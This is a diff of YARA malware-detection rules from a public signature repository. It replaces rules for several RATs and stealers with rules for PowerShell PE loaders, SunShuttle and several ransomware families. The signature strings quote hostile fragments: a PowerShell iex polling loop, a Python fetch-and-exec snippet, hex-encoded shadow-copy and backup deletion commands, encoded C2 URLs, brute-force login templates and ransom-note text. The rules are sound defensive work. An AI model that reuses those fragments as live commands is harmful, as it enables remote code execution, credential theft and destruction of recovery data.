"https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6865-L6894" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "94f5874353d0fb475595373c06a0de91603cad9b435d35dc00febf90608d6b5a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4907-L4920" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7dd377f6a1cc48ef8ab9d53989755fb967c89d3798b721781bc09043ba3d86f4" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "System.Net.Http.SysSR" fullword wide - $s2 = "System.Net.Http.WrSR" fullword wide - $s3 = "yyyy'-'MM'-'dd'T'HH':'mm':'ss.FFFFFFFK" fullword wide - $s4 = { 63 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 0c 6e - 00 6f 00 74 00 69 00 66 00 79 00 04 06 12 80 e8 - 05 00 00 12 80 e8 08 75 00 73 00 65 00 72 00 08 - 74 00 65 00 61 00 6d 00 06 61 00 70 00 70 00 0c - 6e 00 6f 00 61 00 75 00 74 00 68 00 } - $s5 = { 68 00 69 00 64 00 64 00 65 00 6e 00 10 64 00 69 - 00 73 00 61 00 6c 00 6c 00 6f 00 77 00 0e 65 00 - 78 00 74 00 65 00 6e 00 64 00 73 00 04 69 00 64 - 00 16 75 00 6e 00 69 00 71 00 75 00 65 00 49 00 - 74 00 65 00 6d 00 73 } - $s6 = "<RunFileOnes>d__" ascii - $s7 = "<UploadFile>d__" ascii - $s8 = "<ChunkUpload>d__" ascii - $s9 = "<StartFolder>d__" ascii - $s10 = "<ReadFileAlw>d__" ascii - $s12 = "<WriteFileToD>d__" ascii - $s13 = "<ReadFile>d__" ascii - $s14 = "<GetUpload>d__" ascii - $s15 = "CDropbox.Api.DropboxRequestHandler+<RequestJsonStringWithRetry>d__" ascii + $rp1 = "GetType('RunPe.RunPe'" ascii + $rp2 = "GetType(\"RunPe.RunPe\"" ascii + $rm1 = "GetMethod('Run'" ascii + $rm2 = "GetMethod(\"Run\"" ascii + $s1 = ".Invoke(" ascii + $s2 = "[Reflection.Assembly]::Load(" ascii condition: - uint16(0)==0x5a4d and 12 of them + all of ($s*) and 1 of ($rp*) and 1 of ($rm*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Crimsonrat : FILE +rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe02 { meta: - description = "Detects CrimsonRAT" + description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs" author = "ditekSHen" - id = "54c9bbb2-9fa6-5c1f-9272-13255357ddbf" - date = "2024-09-06" - modified = "2024-09-06" + id = "08261054-bebc-58fe-949a-27f6e817003a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6896-L6920" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a40cf09dbaafb2e7b9130af1b40e46b4c38fed6185b16435ad4c118f9e6d56c7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4922-L4934" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d7677689938d3e3eb6b59b99b7e347c60214f6edf8e5f83bf85da5a5f1ad33bb" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" fullword wide - $s2 = "system volume information|" fullword wide - $s3 = "program files (x86)|" fullword wide - $s4 = "program files|" fullword wide - $s5 = "<SAVE_AUTO<|" fullword wide - $s6 = "add_up_files" fullword ascii - $s7 = "see_folders" ascii - $s8 = "see_files" ascii - $s9 = "see_scren" ascii - $s10 = "see_recording" ascii - $s11 = "see_responce" ascii - $s12 = "pull_data" ascii - $s13 = "do_process" ascii - $s14 = "do_updated" ascii - $s15 = "IPSConfig" fullword ascii - $s16 = "#Runing|ver#" wide - $s17 = "|fileslog=" wide + $s1 = "'.Replace('" ascii nocase + $s2 = "'aspnet_compiler.exe'" ascii + $s3 = "[Byte[]]$" ascii + $pe1 = "(77,90," ascii + $pe2 = "='4D5A" ascii condition: - uint16(0)==0x5a4d and 6 of them + all of ($s*) and (#pe1>1 or #pe2>1) and #s1>4 } import "pe" -rule DITEKSHEN_MALWARE_Win_Actionrat : FILE +rule DITEKSHEN_MALWARE_Win_Peloader_Runpe : FILE { meta: - description = "Detects ActionRAT, CSharp and Delfi variants" + description = "Detects PE loader / injector. Observed Gorgon TTPs" author = "ditekSHen" - id = "ceb4bd65-85c0-5614-a7cb-8f3f2f849eae" - date = "2024-09-06" - modified = "2024-09-06" + id = "262dedee-05d2-5783-b0ff-24470d310ab8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6922-L6955" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1552cda3f02c08582e3dd97df98416635a25005081627097df181bfc6aac4665" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4936-L4950" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0369c3e2f83a0265c81e5dcd10b4d88753bd6ce3da4bb893a364486712a2b80d" score = 75 - quality = 71 + quality = 75 tags = "FILE" strings: - $x1 = /<action>(connect|command|drives|getfiles|upload|execute|download)<action>/ fullword wide - $x2 = "aHR0cDovLzE0NC45MS42NS4xMDAv" wide - $x3 = "aHR0cDovL21mYWhvc3QuZGRucy5uZXQv" wide - $f1 = "<updateCommand>b__" ascii - $f2 = "<getDrives>b__" ascii - $f3 = "<getStatus>b__" ascii - $f4 = "<getDirectories>b__" ascii - $f5 = "<updateUpload>b__" ascii - $f6 = "<infinity>b__" ascii - $f7 = "<uploadFile>b__" ascii - $s1 = "beaconURL" ascii - $s2 = "PingReply" ascii - $s3 = "updateUpload" ascii - $s4 = "updateCommand" ascii - $s5 = "runCommand" ascii - $s6 = "uploadFile" ascii - $s7 = "SELECT * FROM MSFT_NetAdapter WHERE ConnectorPresent = True AND DeviceID = '{0}'" fullword wide - $s8 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" fullword wide - $s9 = "Mozilla/3.0" fullword wide - $s10 = "|directory|N/A|" fullword wide - $s11 = "cmd.exe /c" fullword wide - $c1 = /Content-Disposition: form-data; name=(hostname|hid|id|action|secondary)/ fullword wide - $c2 = /(classification|updatecs|update|beacon)\.php/ wide - $c3 = "Content-Disposition: form-data;name=\"{0}\";filename=\"{1}\"filepath=\"{2}\"" fullword wide - $pdb1 = "D:\\Projects\\C#\\HTTP-Simple\\WindowsMediaPlayer - HTTP - " ascii - $pdb2 = "\\WindowsMediaPlayer10\\obj\\x86\\Release\\winow4.pdb" ascii + $s1 = "commandLine'" fullword ascii + $s2 = "RunPe.dll" fullword ascii + $s3 = "HandleRun" fullword ascii + $s4 = "inheritHandles" fullword ascii + $s5 = "BlockCopy" fullword ascii + $s6 = "WriteProcessMemory" fullword ascii + $s7 = "startupInfo" fullword ascii condition: - uint16(0)==0x5a4d and (#x1>5 or ( all of ($f*) and (1 of ($s*) or 2 of ($c*))) or 7 of ($s*) or all of ($c*) or ( all of ($pdb*) and 4 of them ) or (2 of ($x*) and 5 of them )) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Nodachi : FILE +rule DITEKSHEN_MALWARE_Win_Peloader_INF : FILE { meta: - description = "Detects Nodachi infostealer" + description = "Detects PE loader / injector. Potentical HCrypt. Observed Gorgon TTPs" author = "ditekSHen" - id = "bce0c44d-7e75-5c51-ba93-75bd81896921" - date = "2024-09-06" - modified = "2024-09-06" + id = "09823302-34e0-5283-9740-1475ab8077be" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6957-L6972" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c8a262b862a47d5c0c9bd76b722aa4ceb55dd365b5dca35a61318d8a1c53269d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4952-L4963" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "758f7b465b8f9dab5c1194bee266392efe143ac219a5307e6886845b3c862700" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "//AppData//Roaming//kavachdb//kavach.db" ascii - $s1 = "/upload/drive/v3/files/{fileId}" ascii - $s2 = "main.getTokenFromWeb" ascii - $s3 = "main.tokenFromFile" ascii - $s4 = "/goLazagne/" ascii - $s5 = "/extractor/withoutdrive/main.go" ascii - $s6 = "struct { Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii - $s7 = "C://Users//public//cred.json" ascii + $x1 = "Managament.inf" fullword ascii + $x2 = "rOnAlDo" fullword ascii + $x3 = "untimeResourceSet" fullword ascii + $x4 = "3System.Resources.Tools.StronglyTypedResourceBuilder" fullword ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or (4 of ($s*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofhearts : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent08 : FILE { meta: - description = "IAmTheKing Queen Of Hearts payload" + description = "Detects known downloader agent downloading encoded binaries in patches" author = "ditekSHen" - id = "b8d222f0-b3ce-5143-816b-4bbcde645672" - date = "2024-09-06" - modified = "2024-09-06" + id = "e3450f93-7c57-5386-a901-bc5e710657a4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6974-L6991" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0aafeb1dce380ebe6cccc3c7f9564022e1a4cdcf20091943d2bfcc845129152d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4965-L4975" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0238c13b00e5778ef216b4e8576c321803da6e269c96c3051b9cc45a3ac6e567" score = 75 quality = 75 tags = "FILE" + snort2_sid = "920122" + snort3_sid = "920119" strings: - $s1 = "{'session':[{'name':'" ascii - $s2 = "begin mainthread ok" wide - $s3 = "getcommand error" wide - $s4 = "querycode error" wide - $s5 = "Code = %d" wide - $s6 = "cookie size :%d" wide - $s7 = "send request error:%d" wide - $s8 = "PmMytex%d" wide - $s9 = "%s_%c%c%c%c_%d" wide - $s10 = "?what@exception@std@@UBEPBDXZ" ascii + $pat = /\/base\/[A-F0-9]{32}\.html/ ascii wide condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and $pat and #pat>1 } import "pe" -rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofclubs : FILE +rule DITEKSHEN_MALWARE_Win_Doejocrypt : FILE { meta: - description = "IAmTheKing Queen Of Clubs payload" + description = "Detects DoejoCrypt / DearCry ransomware" author = "ditekSHen" - id = "4d19a484-0483-5b3e-a9ad-1cd8ca263a04" - date = "2024-09-06" - modified = "2024-09-06" + id = "2c90f8e7-ced4-56da-ab8d-61b5ba63dacd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6993-L7007" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "28d7d3e9a3b7c104fc5b0fa38ce33b34596f16f6987c34a0e2e3fd93a8a908bd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4977-L4993" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f8a3897de9522340799a59e3e755c323b0defaab73a9030b6b69a1a82c05dcd0" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Not Support!" fullword wide - $s2 = "%s|%s|%s|%s" fullword wide - $s3 = "cmd.exe" fullword wide - $s4 = "for(;;){$S=Get-Content \"%s\";IF($S){\"\" > \"%s\";$t=iex $S 2>\"%s\";$t=$t+' ';echo $t >>\"%s\";}sleep -m " wide - $s5 = "PowerShell.exe -nop -c %s" fullword wide - $s6 = "%s \"%s\" Df" fullword wide - $s7 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" fullword ascii + $s1 = "DEARCRY!" fullword ascii + $s2 = ".CRYPT" fullword ascii + $s3 = "\\EncryptFile -svcV2\\" ascii + $s4 = "please send me the following hash!" ascii + $s5 = "dear!!!" fullword ascii + $s6 = "/readme.txt" fullword ascii + $o1 = { c3 8b 65 e8 c7 45 fc fe ff ff ff 8b b5 f4 e9 ff } + $o2 = { 0f 8c 27 ff ff ff 33 db 57 e8 7b 36 00 00 eb 0a } + $o3 = { 0f 8c 2a ff ff ff 53 57 e8 b7 42 00 00 8b 4c 24 } condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and 4 of ($s*) or ( all of ($o*) and (2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Iamtheking : FILE +rule DITEKSHEN_MALWARE_Win_Sunshuttle : FILE { meta: - description = "IAmTheKing payload" + description = "Detects SunShuttle / GoldMax" author = "ditekSHen" - id = "cf0d7c8d-0ac3-542d-b42e-f215af36044b" - date = "2024-09-06" - modified = "2024-09-06" + id = "1618d0bc-6e72-5f1e-81e7-56611bfd7f8b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7009-L7029" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1cc2aa9b672b8519a3e8a22e31403fb7adace0d430f9cab160e9a7d52e56e875" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4995-L5017" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "fa8feb069e73aa0a7fcb4daecc1fdf8edeff65e5aeefef161626647fe989e5c0" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "DeleteFile \"%s\" Failed,Err=%d" wide - $s2 = "DeleteFile \"%s\" Success" wide - $s3 = "ExcuteFile \"%s\" Failed,Err=%d" wide - $s4 = "ExcuteFile \"%s\" Success" wide - $s5 = "CreateDownLoadFile \"%s\" Failed,Error=%d" wide - $s6 = "uploadFile \"%s\" Failed,errorcode=%d" wide - $s7 = "CreateUpLoadFile \"%s\" Success" wide - $s8 = "im the king" ascii - $s9 = "dont disturb me" fullword ascii - $s10 = "kill me or love me" fullword ascii - $s11 = "please leave me alone" fullword ascii - $s12 = "calculate the NO." fullword ascii - $s13 = "\\1-driver-vmsrvc" fullword ascii + $s1 = "main.beaconing" fullword ascii + $s2 = "main.clean_file" fullword ascii + $s3 = "main.decrypt" fullword ascii + $s4 = "main.define_internal_settings" fullword ascii + $s5 = "main.delete_empty" fullword ascii + $s6 = "main.encrypt" fullword ascii + $s7 = "main.false_requesting" fullword ascii + $s8 = "main.removeBase64Padding" fullword ascii + $s9 = "main.resolve_command" fullword ascii + $s10 = "main.retrieve_session_key" fullword ascii + $s11 = "main.save_internal_settings" fullword ascii + $s12 = "main.send_command_result" fullword ascii + $s13 = "main.send_file_part" fullword ascii + $s14 = "main.wget_file" fullword ascii + $s15 = "main.write_file" fullword ascii condition: - uint16(0)==0x5a4d and 7 of them + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Gobrut : FILE +rule DITEKSHEN_MALWARE_Win_Ranzylocker : FILE { meta: - description = "Detects unknown Go multi-bruteforcer bot (StealthWorker / GoBrut) against multiple systems: QNAP, MagOcart, WordPress, Opencart, Bitrix, Postgers, MySQL, Drupal, Joomla, SSH, FTP, Magneto, CPanel" + description = "Detects RanzyLocker / REntS ransomware" author = "ditekSHen" - id = "f5605123-12d9-55d1-8a32-acebf16834f8" - date = "2024-09-06" - modified = "2024-09-06" + id = "0d74f6fd-e1d2-5939-991e-7fdd2ca3310b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7031-L7086" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fb93d0dcf7f38294444ac6d2e1a7a126027ce07f0305af9ae0f8aa8f4b806c5c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5019-L5042" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "15897144843acf49b81c5428fd1bb56d7a2acf16047a6e5d3ca4f2aaa8891577" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $x1 = "/src/StealthWorker/Worker" ascii - $x2 = "/go/src/Cloud_Checker/" ascii - $x3 = "brutXmlRpc" ascii - $s1 = "main.WPBrut" ascii - $s2 = "main.WPChecker" ascii - $s3 = "main.WooChecker" ascii - $s4 = "main.StandartBrut" ascii - $s5 = "main.StandartBackup" ascii - $s6 = "main.WpMagOcartType" ascii - $s7 = "main.StandartAdminFinder" ascii - $w1 = "/WorkerQnap_brut/main.go" ascii - $w2 = "/WorkerHtpasswd_brut/main.go" ascii - $w3 = "/WorkerOpencart_brut/main.go" ascii - $w4 = "/WorkerBitrix_brut/main.go" ascii - $w5 = "/WorkerPostgres_brut/main.go" ascii - $w6 = "/WorkerMysql_brut/main.go" ascii - $w7 = "/WorkerFTP_brut/main.go" ascii - $w8 = "/WorkerSSH_brut/main.go" ascii - $w9 = "/WorkerDrupal_brut/main.go" ascii - $w10 = "/WorkerJoomla_brut/main.go" ascii - $w11 = "/WorkerMagento_brut/main.go" ascii - $w12 = "/WorkerWHM_brut/main.go" ascii - $w13 = "/WorkerCpanel_brut/main.go" ascii - $w14 = "/WorkerPMA_brut/main.go" ascii - $w15 = "/WorkerWP_brut/main.go" ascii - $p1 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=cpanel" ascii - $p2 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=ftpBrut" ascii - $p3 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=mysql_b" ascii - $p4 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=qnapBrt" ascii - $p5 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=OCartBrt" ascii - $p6 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=phpadmin" ascii - $p7 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=bitrixBrt" ascii - $p8 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=drupalBrt" ascii - $p9 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=joomlaBrt" ascii - $p10 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=htpasswdBrt" ascii - $p11 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=magentoBrt" ascii - $p12 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=postgres_b" ascii - $p13 = "AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=%s&USER_PASSWORD=%s&Login=&captcha_sid=&captcha_word=" ascii - $p14 = "%qlog=%s&pwd=%s&wp-submit=Log In&redirect_to=%s/wp-admin/&testcookie=1" ascii - $p15 = "name=%s&pass=%s&form_build_id=%s&form_id=user_login_form&op=Log" ascii - $p16 = "username=%s&passwd=%s&option=com_login&task=login&return=%s&%s=1" ascii - $v1_1 = "brutC" fullword ascii - $v1_2 = "XmlRpc" fullword ascii - $v1_3 = "shouldRetry$" ascii - $v1_4 = "HttpC|%" ascii - $v1_5 = "ftpH%_" ascii - $v1_6 = "ssh%po" ascii - $v1_7 = "?sevlyar/4-da" ascii + $hr1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii + $hr2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii + $hr3 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii + $hr4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii + $hr5 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" ascii + $hr6 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii + $hx1 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii + $hx2 = "534F4654574152455C4D6963726F736F66745C45524944" ascii + $hx3 = "227375626964223A22" ascii + $hx4 = "226E6574776F726B223A22" ascii + $hx5 = "726561646D652E747874" ascii + $hx6 = "-nolan" fullword wide + $o1 = { 8d 45 e9 89 9d 54 ff ff ff 88 9d 44 ff ff ff 3b } + $o2 = { 8b 44 24 2? 8b ?c 24 34 40 8b 54 24 38 89 44 24 } + $o3 = { 8b 44 24 2? 8b ?c 24 1c 89 44 24 34 8b 44 24 28 } + $o4 = { 8b 44 24 2? 8b ?c 24 34 05 00 00 a0 00 89 44 24 } condition: - ( uint16(0)==0x5a4d or uint16(0)==0x457f) and ((2 of ($x*) and 3 of ($s*)) or all of ($s*) or 6 of ($w*) or 6 of ($p*) or 6 of ($v1*) or 12 of them ) + uint16(0)==0x5a4d and ( all of ($hx*) or (2 of ($hr*) and 2 of ($hx*)) or ( all of ($o*) and 2 of ($h*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Biopass_Dropper : FILE +rule DITEKSHEN_MALWARE_Win_Wobbychipmbr : FILE { meta: - description = "Detects Go BioPass dropper" + description = "Detects WobbyChipMBR / Covid-21 ransomware" author = "ditekSHen" - id = "56037c79-59f7-587c-8f54-c9618e871f34" - date = "2024-09-06" - modified = "2024-09-06" + id = "581fbce1-128d-5323-a259-14d9bfdf09b1" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7088-L7111" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "06f3b3ee38349ddcf9be7cbb7627d60fa673962409dde6e4badd112841a3ed19" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5044-L5060" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "168c7f610625131c9552252d2b824a90918d2961996ee0f783497dff5cf17351" score = 75 quality = 75 tags = "FILE" strings: - $go = "Go build ID:" ascii - $s1 = "main.NetWorkStatus" ascii - $s2 = "main.NoErrorRunFunction" ascii - $s3 = "main.FileExist" ascii - $s4 = "main.execute" ascii - $s5 = "main.PsGenerator" ascii - $s6 = "main.downFile" ascii - $s7 = "main.Unzip" ascii - $url1 = "https://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/" ascii - $x1 = "SCHTASKS /Run /TN SYSTEM_CDAEMON" ascii - $x2 = "SCHTASKS /Run /TN SYSTEM_SETTINGS" ascii - $x3 = "SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST" ascii - $x4 = ".exe /install /quiet /norestart" ascii - $x5 = "exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\\''http" ascii - $x6 = "powershell.exe -Command $" ascii - $x7 = ".Path ='-----BEGIN RSA TESTING KEY-----" ascii + $x1 = "You became a Victim of the Covid-21 Ransomware" ascii wide + $x2 = "Reinstalling Windows has been blocked" ascii wide + $x3 = "Enter Decryption Key:" ascii wide + $x4 = "encrypted with military grade encryption" ascii wide + $s1 = "schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR" ascii + $s2 = "\\EFI\\Boot\\bootx64.efi" ascii wide + $s3 = "DumpHex" fullword ascii + $s4 = "TFTP Error" fullword wide + $s5 = "HD(Part%d,MBRType=%02x,SigType=%02x)" fullword wide condition: - uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($x*) or (1 of ($url*) and ($go)) or 9 of them ) + uint16(0)==0x5a4d and (3 of ($x*) or all of ($s*) or (1 of ($x*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_A310Logger : FILE +rule DITEKSHEN_MALWARE_Win_Snatch : FILE { meta: - description = "Detects A310Logger" + description = "Detects Snatch / GoRansome / MauriGo ransomware" author = "ditekSHen" - id = "d2cf2f7b-5710-56ab-b13d-97a70fe7f618" - date = "2024-09-06" - modified = "2024-09-06" + id = "00dce673-b909-571f-8117-c5d4ce73fb31" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7113-L7149" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8205169c9c78eb784b9d07a5fd85ad3a54763452e1e315f7e7911b8ac49a6c01" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5062-L5091" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bf8c33a7203458c80a43944c3117bb897b1702f0024271904d9be682cbd695fc" score = 75 quality = 73 tags = "FILE" - snort_sid = "920204-920207" strings: - $s1 = "Temporary Directory * for" fullword wide - $s2 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide - $s3 = "@ENTIFIER=" wide - $s4 = "ExecQuery" fullword wide - $s5 = "MSXML2.ServerXMLHTTP.6.0" fullword wide - $s6 = "Content-Disposition: form-data; name=\"document\"; filename=\"" wide - $s7 = "CopyHere" fullword wide - $s8 = "] Error in" fullword wide - $s9 = "shell.application" fullword wide nocase - $s10 = "SetRequestHeader" fullword wide - $s11 = "\\Ethereum\\keystore" fullword wide - $s12 = "@TITLE Removing" fullword wide - $s13 = "@RD /S /Q \"" fullword wide - $en1 = "Unsupported encryption" fullword wide - $en2 = "BCryptOpenAlgorithmProvider(SHA1)" fullword wide - $en3 = "BCryptGetProperty(ObjectLength)" fullword wide - $en4 = "BCryptGetProperty(HashDigestLength)" fullword wide - $v1_1 = "PW\\FILES\\SC::" wide - $v1_2 = "AddAttachment" fullword wide - $v1_3 = "Started:" fullword wide - $v1_4 = "Ended:" fullword wide - $v1_5 = "sharedSecret" fullword wide - $v1_6 = "\":\"([^\"]+)\"" fullword wide - $v1_7 = "\\credentials.txt" fullword wide - $v1_8 = "WritePasswords" fullword ascii - $v1_9 = "sGeckoBrowserPaths" fullword ascii - $v1_10 = "get_sPassword" fullword ascii + $s1 = "main.encryptFile" ascii + $s2 = "main.encryptFileExt" ascii + $s3 = "main.deleteShadowCopy" ascii + $s4 = "main.Shadow" fullword ascii + $s5 = "main.RecoverMe" fullword ascii + $s6 = "main.EncryptWithPublicKey" ascii + $s7 = "main.EncoderLookupDir" fullword ascii + $s8 = "main.ALIGNUP" fullword ascii + $s9 = "main.encrypt" fullword ascii + $s10 = "github.com/mauri870/ransomware" ascii + $m1 = "Dear You, ALl Your files On YOUR network computers are encrypted" ascii + $m2 = "You have to pay the ransom of %s USD in bitcoins to the address" ascii + $m3 = "REMEMBER YOU FILES ARE IN SAVE HANDS AND WILL BE RESTORED OR RECOVERED ONCE PAYMENT IS DONE" ascii + $m4 = ":HELP FEEED A CHILD:" ascii + $m5 = ">SYSTEM NETWORK ENCRYPTED<" ascii + $m6 = "YOUR IDENTIFICATION : %s" ascii + $m7 = "convince you of our honesty" ascii + $m8 = "use TOR browser to talk with support" ascii + $m9 = "encrypted and attackers are taking" ascii + $p1 = "/Go/src/kitty/kidrives/" ascii + $p2 = "/LGoGo/encoder.go" ascii nocase + 